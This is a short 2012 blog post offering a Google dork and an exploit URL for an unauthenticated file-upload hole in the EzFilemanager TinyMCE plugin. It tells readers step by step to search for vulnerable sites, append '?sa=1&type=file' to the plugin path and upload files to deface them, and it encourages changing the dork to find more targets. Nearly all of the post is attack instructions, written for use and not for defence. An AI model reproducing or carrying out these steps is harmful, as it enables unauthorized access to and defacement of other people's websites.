Friday, 3 February 2012

EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

image_2313242.original.jpg (355×338)

Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Live Demo :

Result :

Leave a comment if you enjoyed this post :D

No comments:

Post a Comment